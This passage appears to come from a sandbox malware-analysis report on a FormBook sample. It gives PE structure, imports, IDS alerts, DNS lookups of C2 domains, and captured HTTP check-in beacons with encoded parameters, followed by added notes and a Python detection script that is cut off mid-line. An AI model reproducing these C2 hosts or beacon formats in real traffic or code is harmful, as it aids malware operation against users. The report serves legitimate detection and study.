IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0xb2730  | 0x40    | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0      | 0x0     |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x8d000  | 0x860   | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0      | 0x0     |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0      | 0x0     |
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0      | 0x0     |
Sections (Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics)
.text  | 0x1000   | 0x8b54f | 0x8b600 | f437a6545e938612764dbb0a314376fc | False | 0.5699499019058296  | data | 6.680413749210956 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8d000  | 0x2cc42 | 0x2ce00 | 827ffd24759e8e420890ecf164be989e | False | 0.330464397632312   | data | 5.770192333189168 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data  | 0xba000  | 0x9d54  | 0x6200  | e0a519f8e3a35fae0d9c2cfd5a4bacfc | False | 0.16402264030612246 | data | 2.002691099965349 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc  | 0xc4000  | 0xa0de0 | 0xa0e00 | 120f266359a8700f7f9f7cd6fe0ebcc2 | False | 0.5918059804778555  | data | 6.633591343110549 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x165000 | 0xa474  | 0xa600  | 0bc98f8631ef0bde830a7f83bb06ff08 | False | 0.5017884036144579  | data | 5.245426654116355 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Reading note: the section layout is an ordinary MSVC layout, with no writable-and-executable section and no section whose virtual size wildly exceeds its raw size (.data at 0x9d54 vs 0x6200 is just zero-filled uninitialised data). What stands out is .rsrc: 0xa0de0 bytes, about 44% of the 1'482'240-byte file, at entropy 6.63, which is where a compiled AutoIt executable (see the "Binary is likely a compiled AutoIt script file" signature above) carries its script, and therefore the first place to look for the embedded payload. The entrypoint 0x425f74 falls inside .text (0x401000 to 0x48c54f), as expected for an unpacked CRT entry.
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0xc45d8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216 |
| RT_ICON | 0xc4700 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027 |
| RT_ICON | 0xc4828 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135 |
| RT_ICON | 0xc4950 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 270336 | English | Great Britain | 0.34382119714767584 |
| RT_ICON | 0x106978 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | Great Britain | 0.4301727197444694 |
| RT_ICON | 0x1171a0 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | Great Britain | 0.5156874080302711 |
| RT_ICON | 0x120648 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | Great Britain | 0.5365526802218115 |
| RT_ICON | 0x125ad0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | Great Britain | 0.5247401983939537 |
| RT_ICON | 0x129cf8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5785269709543569 |
| RT_ICON | 0x12c2a0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6036585365853658 |
| RT_ICON | 0x12d348 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | Great Britain | 0.6827868852459016 |
| RT_ICON | 0x12dcd0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7535460992907801 |
| RT_MENU | 0x12e138 | 0x50 | data | English | Great Britain | 0.9 |
| RT_STRING | 0x12e188 | 0x594 | data | English | Great Britain | 0.3333333333333333 |
| RT_STRING | 0x12e71c | 0x68a | data | English | Great Britain | 0.2747909199522103 |
| RT_STRING | 0x12eda8 | 0x490 | data | English | Great Britain | 0.3715753424657534 |
| RT_STRING | 0x12f238 | 0x5fc | data | English | Great Britain | 0.3087467362924282 |
| RT_STRING | 0x12f834 | 0x65c | data | English | Great Britain | 0.34336609336609336 |
| RT_STRING | 0x12fe90 | 0x466 | data | English | Great Britain | 0.3605683836589698 |
| RT_STRING | 0x1302f8 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186 |
| RT_RCDATA | 0x130450 | 0x34442 | data | | | 1.0003550041572855 |
| RT_GROUP_ICON | 0x164894 | 0x84 | data | English | Great Britain | 0.7196969696969697 |
| RT_GROUP_ICON | 0x164918 | 0x14 | data | English | Great Britain | 1.25 |
| RT_GROUP_ICON | 0x16492c | 0x14 | data | English | Great Britain | 1.15 |
| RT_GROUP_ICON | 0x164940 | 0x14 | data | English | Great Britain | 1.25 |
| RT_VERSION | 0x164954 | 0xdc | data | English | Great Britain | 0.6181818181818182 |
| RT_MANIFEST | 0x164a30 | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain | 0.5116525423728814 |
| DLL | Import |
|---|---|
| WSOCK32.dll | __WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket |
| VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW |
| WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW |
| COMCTL32.dll | ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon |
| MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W |
| WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable |
| PSAPI.DLL | GetProcessMemoryInfo |
| IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho |
| USERENV.dll | UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW |
| UxTheme.dll | IsThemeActive |
| KERNEL32.dll | HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA |
| USER32.dll | SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW |
| GDI32.dll | SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath |
| COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW |
| ADVAPI32.dll | GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce |
| SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish |
| ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket |
| OLEAUT32.dll | RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit |
| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | Great Britain | |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-23T13:58:16.204199+0100 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.4 | 49772 | 45.38.60.47 | 80 | TCP |
| 2024-12-23T13:58:16.204199+0100 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.4 | 49772 | 45.38.60.47 | 80 | TCP |
| 2024-12-23T13:58:16.204199+0100 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.4 | 49772 | 45.38.60.47 | 80 | TCP |
| 2024-12-23T13:58:37.356933+0100 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.4 | 49819 | 198.252.111.49 | 80 | TCP |
| 2024-12-23T13:58:37.356933+0100 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.4 | 49819 | 198.252.111.49 | 80 | TCP |
| 2024-12-23T13:58:37.356933+0100 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.4 | 49819 | 198.252.111.49 | 80 | TCP |
| 2024-12-23T13:59:00.358258+0100 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.4 | 49885 | 104.21.40.196 | 80 | TCP |
| 2024-12-23T13:59:00.358258+0100 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.4 | 49885 | 104.21.40.196 | 80 | TCP |
| 2024-12-23T13:59:00.358258+0100 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.4 | 49885 | 104.21.40.196 | 80 | TCP |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Dec 23, 2024 13:58:15.112931013 CET | 49772 | 80 | 192.168.2.4 | 45.38.60.47 |
| Dec 23, 2024 13:58:15.232954979 CET | 80 | 49772 | 45.38.60.47 | 192.168.2.4 |
| Dec 23, 2024 13:58:15.235979080 CET | 49772 | 80 | 192.168.2.4 | 45.38.60.47 |
| Dec 23, 2024 13:58:15.235980034 CET | 49772 | 80 | 192.168.2.4 | 45.38.60.47 |
| Dec 23, 2024 13:58:15.355819941 CET | 80 | 49772 | 45.38.60.47 | 192.168.2.4 |
| Dec 23, 2024 13:58:15.745877028 CET | 49772 | 80 | 192.168.2.4 | 45.38.60.47 |
| Dec 23, 2024 13:58:15.907917023 CET | 80 | 49772 | 45.38.60.47 | 192.168.2.4 |
| Dec 23, 2024 13:58:16.204147100 CET | 80 | 49772 | 45.38.60.47 | 192.168.2.4 |
| Dec 23, 2024 13:58:16.204199076 CET | 49772 | 80 | 192.168.2.4 | 45.38.60.47 |
| Dec 23, 2024 13:58:36.279192924 CET | 49819 | 80 | 192.168.2.4 | 198.252.111.49 |
| Dec 23, 2024 13:58:36.398832083 CET | 80 | 49819 | 198.252.111.49 | 192.168.2.4 |
| Dec 23, 2024 13:58:36.398897886 CET | 49819 | 80 | 192.168.2.4 | 198.252.111.49 |
| Dec 23, 2024 13:58:36.401154041 CET | 49819 | 80 | 192.168.2.4 | 198.252.111.49 |
| Dec 23, 2024 13:58:36.520661116 CET | 80 | 49819 | 198.252.111.49 | 192.168.2.4 |
| Dec 23, 2024 13:58:36.901844978 CET | 49819 | 80 | 192.168.2.4 | 198.252.111.49 |
| Dec 23, 2024 13:58:37.064100027 CET | 80 | 49819 | 198.252.111.49 | 192.168.2.4 |
| Dec 23, 2024 13:58:37.356832981 CET | 80 | 49819 | 198.252.111.49 | 192.168.2.4 |
| Dec 23, 2024 13:58:37.356933117 CET | 49819 | 80 | 192.168.2.4 | 198.252.111.49 |
| Dec 23, 2024 13:58:59.345669031 CET | 49885 | 80 | 192.168.2.4 | 104.21.40.196 |
| Dec 23, 2024 13:58:59.465219021 CET | 80 | 49885 | 104.21.40.196 | 192.168.2.4 |
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:59.466597080 CET4988580192.168.2.4104.21.40.196
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:59.466643095 CET4988580192.168.2.4104.21.40.196
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:59.586256981 CET8049885104.21.40.196192.168.2.4
                                                                                                                                                                                                                                                    Dec 23, 2024 13:58:59.980006933 CET4988580192.168.2.4104.21.40.196
                                                                                                                                                                                                                                                    Dec 23, 2024 13:59:00.143965960 CET8049885104.21.40.196192.168.2.4
                                                                                                                                                                                                                                                    Dec 23, 2024 13:59:00.357793093 CET8049885104.21.40.196192.168.2.4
                                                                                                                                                                                                                                                    Dec 23, 2024 13:59:00.358258009 CET4988580192.168.2.4104.21.40.196
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 23, 2024 13:57:34.434173107 CET | 53636 | 53 | 192.168.2.4 | 1.1.1.1
Dec 23, 2024 13:57:34.986418962 CET | 53 | 53636 | 1.1.1.1 | 192.168.2.4
Dec 23, 2024 13:57:54.730197906 CET | 57654 | 53 | 192.168.2.4 | 1.1.1.1
Dec 23, 2024 13:57:54.948425055 CET | 53 | 57654 | 1.1.1.1 | 192.168.2.4
Dec 23, 2024 13:58:14.589582920 CET | 62724 | 53 | 192.168.2.4 | 1.1.1.1
Dec 23, 2024 13:58:15.112318039 CET | 53 | 62724 | 1.1.1.1 | 192.168.2.4
Dec 23, 2024 13:58:35.663893938 CET | 52003 | 53 | 192.168.2.4 | 1.1.1.1
Dec 23, 2024 13:58:36.277868032 CET | 53 | 52003 | 1.1.1.1 | 192.168.2.4
Dec 23, 2024 13:58:45.971921921 CET | 49385 | 53 | 192.168.2.4 | 1.1.1.1
Dec 23, 2024 13:58:58.943607092 CET | 51045 | 53 | 192.168.2.4 | 1.1.1.1
Dec 23, 2024 13:58:59.344844103 CET | 53 | 51045 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 23, 2024 13:57:34.434173107 CET | 192.168.2.4 | 1.1.1.1 | 0x997a | Standard query (0) | www.imxtld.club | A (IP address) | IN (0x0001) | false
Dec 23, 2024 13:57:54.730197906 CET | 192.168.2.4 | 1.1.1.1 | 0xad2d | Standard query (0) | www.ux-design-courses-53497.bond | A (IP address) | IN (0x0001) | false
Dec 23, 2024 13:58:14.589582920 CET | 192.168.2.4 | 1.1.1.1 | 0x4a6f | Standard query (0) | www.vytech.net | A (IP address) | IN (0x0001) | false
Dec 23, 2024 13:58:35.663893938 CET | 192.168.2.4 | 1.1.1.1 | 0xaf15 | Standard query (0) | www.lebahsemesta57.click | A (IP address) | IN (0x0001) | false
Dec 23, 2024 13:58:45.971921921 CET | 192.168.2.4 | 1.1.1.1 | 0x96f6 | Standard query (0) | api.msn.com | A (IP address) | IN (0x0001) | false
Dec 23, 2024 13:58:58.943607092 CET | 192.168.2.4 | 1.1.1.1 | 0xa843 | Standard query (0) | www.7b5846.online | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 23, 2024 13:57:54.948425055 CET | 1.1.1.1 | 192.168.2.4 | 0xad2d | Name error (3) | www.ux-design-courses-53497.bond | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 13:58:15.112318039 CET | 1.1.1.1 | 192.168.2.4 | 0x4a6f | No error (0) | www.vytech.net | | 45.38.60.47 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 13:58:36.277868032 CET | 1.1.1.1 | 192.168.2.4 | 0xaf15 | No error (0) | www.lebahsemesta57.click | lebahsemesta57.click | | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 13:58:36.277868032 CET | 1.1.1.1 | 192.168.2.4 | 0xaf15 | No error (0) | lebahsemesta57.click | | 198.252.111.49 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 13:58:46.109687090 CET | 1.1.1.1 | 192.168.2.4 | 0x96f6 | No error (0) | api.msn.com | api-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 13:58:59.344844103 CET | 1.1.1.1 | 192.168.2.4 | 0xa843 | No error (0) | www.7b5846.online | | 104.21.40.196 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 13:58:59.344844103 CET | 1.1.1.1 | 192.168.2.4 | 0xa843 | No error (0) | www.7b5846.online | | 172.67.188.70 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                                    • www.vytech.net
                                                                                                                                                                                                                                                    • www.lebahsemesta57.click
                                                                                                                                                                                                                                                    • www.7b5846.online
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49772 | 45.38.60.47 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 13:58:15.235980034 CET | 167 | OUT | GET /hwu6/?NvW8gh=3eE7W8JGsE0Z0gf0dkzWoMqC44Ih/LpQP6YOK8HSo/jc9NPr5lNFbiMzFCC+b/Y1vVpG&1bd=qBZpwRT8rpbTOZn HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.vytech.net
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                    Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49819 | 198.252.111.49 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 13:58:36.401154041 CET | 177 | OUT | GET /hwu6/?NvW8gh=ODu4ekR727XBQcKUwHIo8nVNut1O1Z6HvIEUsjxvVtHRsmxVrOVq8qUINChS6+VnMtr8&1bd=qBZpwRT8rpbTOZn HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.lebahsemesta57.click
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                    Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49885 | 104.21.40.196 | 80 | 3052 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 23, 2024 13:58:59.466643095 CET | 167 | OUT | GET /hwu6/?adoHn6=uXc87hFXpvg4&Rl7=YeF1y3FAQJcqH3tuWfJk7b1+zf3Y35LdyPqCzn7ElcW/f++Fd6XCLGgtd1rezRCsTdps HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.7b5846.online
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                    Data Ascii:
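
The three sessions above share what the verdict alone does not spell out: each request is a GET to the same path /hwu6/ on a different host, the query values look base64-encoded, the only headers are Host and Connection: close, and the client is C:\Windows\explorer.exe. Each request was preceded by a DNS lookup of one candidate domain roughly every 20 seconds, with one NXDOMAIN (www.ux-design-courses-53497.bond) and a benign api.msn.com lookup interleaved. The following is an added detection example, not code from the Joe Sandbox report or from Joe Security; it feeds the DNS queries and HTTP requests copied from the tables above through two heuristics that key on those traits. The thresholds (four domains, 5-second tolerance, two hosts), the UNUSUAL_HTTP_CLIENTS set and the two-label registered_domain helper are assumptions chosen for illustration.

```python
"""Flag FormBook-style C2 beaconing in sandbox DNS and HTTP records.

Added example, not code from the Joe Sandbox report. Sample records are
copied from the tables above; thresholds and UNUSUAL_HTTP_CLIENTS are
assumptions chosen for illustration.
"""
import re
from collections import defaultdict, namedtuple
from datetime import datetime
from urllib.parse import urlsplit

_TS = re.compile(r"^(\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d{6})\d*\s*\w*$")

def parse_ts(text):
    """'Dec 23, 2024 13:57:34.434173107 CET' -> naive datetime (ns trimmed to us)."""
    m = _TS.match(text)
    if not m:
        raise ValueError(f"unrecognised timestamp: {text!r}")
    return datetime.strptime(m.group(1), "%b %d, %Y %H:%M:%S.%f")

DnsQuery = namedtuple("DnsQuery", "ts src name")
HttpRequest = namedtuple("HttpRequest", "ts src host process request_line headers")

def registered_domain(name):
    """Last two labels; a simplification that ignores the public suffix list."""
    return ".".join(name.rstrip(".").split(".")[-2:])

def dns_cadence_alerts(queries, min_domains=4, tolerance=5.0):
    """(src, median_gap_s, domains) for each client that walks a domain list at a
    steady interval; the median gap tolerates interleaved benign lookups."""
    by_src = defaultdict(list)
    for q in queries:
        by_src[q.src].append(q)
    alerts = []
    for src, qs in by_src.items():
        qs = sorted(qs, key=lambda q: q.ts)
        domains = sorted({registered_domain(q.name) for q in qs})
        gaps = [(b.ts - a.ts).total_seconds() for a, b in zip(qs, qs[1:])]
        if len(domains) < min_domains or not gaps:
            continue
        median = sorted(gaps)[len(gaps) // 2]
        if sum(abs(g - median) <= tolerance for g in gaps) >= min_domains - 1:
            alerts.append((src, round(median, 1), domains))
    return alerts

_B64ISH = re.compile(r"^[A-Za-z0-9+/]{8,}={0,2}$")
UNUSUAL_HTTP_CLIENTS = {"explorer.exe"}  # assumption: tune per environment

def _query_values(query):
    # Split by hand: urllib.parse.parse_qsl turns '+' into a space and would
    # defeat the base64 check.
    return [kv.split("=", 1)[1] for kv in query.split("&") if "=" in kv]

def shared_path_alerts(requests, min_hosts=2):
    """Flag a URL path reused across different Host headers and record the
    traits visible in the report: base64-like values, no User-Agent, odd client."""
    by_path = defaultdict(list)
    for r in requests:
        method, target, _ = r.request_line.split(" ", 2)
        if method == "GET":
            by_path[urlsplit(target).path].append((r, urlsplit(target).query))
    alerts = []
    for path, items in by_path.items():
        hosts = sorted({r.host for r, _ in items})
        if len(hosts) < min_hosts:
            continue
        values = [v for _, q in items for v in _query_values(q)]
        alerts.append({
            "path": path, "hosts": hosts,
            "base64_like": bool(values) and all(_B64ISH.match(v) for v in values),
            "no_user_agent": all("user-agent" not in {k.lower() for k in r.headers}
                                 for r, _ in items),
            "unusual_client": any(r.process.rsplit("\\", 1)[-1].lower()
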